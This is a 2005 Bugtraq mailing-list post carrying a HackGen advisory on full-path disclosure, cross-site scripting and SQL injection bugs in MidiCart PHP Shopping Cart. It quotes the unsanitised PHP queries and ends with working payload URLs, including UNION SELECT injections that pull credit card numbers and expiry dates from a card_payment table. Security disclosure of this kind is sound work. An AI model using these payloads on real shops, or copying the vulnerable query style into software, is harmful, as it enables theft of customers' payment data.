[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [hackgen-2005-#004] - Multiple bugs in MidiCart PHP Shopping Cart
From:       Exoduks <exoduks () gmail ! com>
Date:       2005-05-05 17:01:34
Message-ID: 20050505170134.18885.qmail () www ! securityfocus ! com
[Download RAW message or body]



http://www.hackgen.org/advisories/hackgen-2005-004.txt

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'                          [hackgen-2005-#004]                       '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'              Multiple bugs in MidiCart PHP Shopping Cart           '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
  
  Software: MidiCart PHP Shopping Cart
  Homepage: http://www.midicart.com/
  Author: "Exoduks" - HackGen Team
  Release Date: 5 May, 2005
  Website: www.hackgen.org
  Mail: exoduks [at] gmail . com
  
 

 0x01 - Affected software description:
 -------------------------------------
 MidiCart is a Try-Before-You-Buy Shopping Cart Software, that provides all you need \
to   create, operate, and maintain a professional Internet shop. MidiCart ASP and PHP \
Shopping   Cart is extremely easy to use, flexible, powerful and affordable \
e-commerce solution for   your web site.              



 0x02 - Vulnerability Discription:
 ---------------------------------
 There are several vulnarabilities in midicart. First there are some full-path \
disclosure  bugs because of some undefined variable and if php.ini is set to \
display_errors = on we   will see full path of the script. Second vulnerability is \
xss in item_list.php and   search_list.php file which doesn't have any checking of \
input string so it is possible to   inject some evil code and execute through the \
browser. Third bug is a sql injection also   in search_list.php, item_list.php and \
item_show.php file also because there isn't any   filtering and checking of input \
string which will be executed in mysql command so with   special crafted sql command \
we can get some sensitve information from database.  


 0x03 - Vulnerability Code:
 --------------------------
 Code vulnarable to sql injectio in search_list.php file
 ...
 // database query to select the categories
 $result = mysql_query("select * from products WHERE $chose LIKE '%$searchstring%' \
ORDER BY   'maingroup','secondgroup','code_no' LIMIT 0, 100 ") ;
 ...

 Code vulnarable to sql injectio in item_show.php file
 // query to get the products of type $category
 $result = mysql_query("select * from products where(code_no = '$code_no') ORDER BY \
'item'");


 0x04 - How to fix this bug:
 ---------------------------
 Vendor has beed contacted and he we probably publish new version of this shopping \
cart so go to   http://www.midicart.com/ and look for new version.


 0x05 - Exploit:
 ----------------

 Full-path disclosure !
 -----------------------
 http://site.com/shop/search_list.php
 http://site.com/shop/item_list.php
 http://site.com/shop/item_show.php
 
 XSS !
 ------
 http://site.com/shop/search_list.php?chose=item&searchstring=%3Cscri \
pt%3Ealert('Lamed%20!');%3C/script%3E  \
http://site.com/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
  http://site.com/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
  
 SQL injection !
 ----------------
 http://site.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, \
null, CreditCard,   ExpDate,null, null, null, null, null, null, null, null, null, \
null, null, null, null, null, null, null,   null, null, null, null, null, null, null, \
null FROM card_payment /*

 http://site.com/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, \
CreditCard, ExpDate,null,   null, null, null, null, null, null, null, null, null, \
null, null, null, null, null, null, null, null,   null, null, null, null, null, null \
FROM card_payment /*  
 http://site.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, \
CreditCard, ExpDate,null,   null, null, null, null, null, null, null, null, null, \
null, null, null, null, null, null, null, null,   null, null, null, null, null, null \
FROM card_payment /*  
 http://site.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, \
CreditCard, ExpDate,null,   null, null, null, null, null, null, null, null, null, \
null, null, null, null, null, null, null, null,   null, null, null, null, null, null \
FROM card_payment /* 

 * works with magic_quotes_gpc set to Off in php.ini file 



 0x006 - The End:
 ----------------
 And we are at the end again. Grejtttzz to blackhat.headcoders.net

                         ______________________________________
                          Written By Exoduks - www.hackgen.org


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic